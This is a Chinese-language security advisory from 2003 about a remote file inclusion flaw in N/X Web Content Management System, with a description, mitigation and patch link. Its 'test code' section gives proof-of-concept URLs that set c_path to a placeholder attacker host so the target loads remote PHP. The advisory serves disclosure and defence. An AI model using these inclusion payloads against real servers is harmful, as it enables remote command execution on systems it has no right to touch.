N/X Web内容管理系统远程文件包含漏洞发布时间:2003-03-09 更新时间:2003-03-09 严重程度:高 威胁程度:普通用户访问权限 错误类型:配置错误 利用方式:服务器模式 BUGTRAQ ID:6500 受影响系统 N/X Web Content Management System 2002 Prerelease 1详细描述 N/X Web内容管理系统允许用户指定包含远程服务器上的文件,远程入侵者可能利用这个问题让服务器程序脚本包含一个远程的入侵者所控制的服务器上的PHP恶意脚本,从而导致服务器程序以Web进程权限执行任意入侵者的任意命令,入侵者获取本地普通用户访问权限。 测试代码 http://[target]/nx/common/cds/menu.inc.php?c_path=http://[attacker]/ with : http://[attacker]/common/lib/launch.inc.php http://[target]/nx/common/dbo/datasets.php?c_path=http://[attacker]/ with : http://[attacker]/common/dbo/saveset.php http://[attacker]/common/dbo/recordset.php http://[attacker]/common/dbo/deleteset.php http://[attacker]/common/dbo/updateset.php http://[attacker]/common/dbo/insertset.php 解决方案 临时解决方案是修改PHP的配置文件php.ini,关闭'allow_url_fopen'和'register_globals'选项中的任意一个。 "Frog man"提供如下第三方补丁: http://www.phpsecure.org/index.php?id=88&zone=pDl 相关信息 Frog Man <leseulfrog@hotmail.com> N/X (PHP) http://archives.neohapsis.com/archives/bugtraq/2003-01/0005.html |
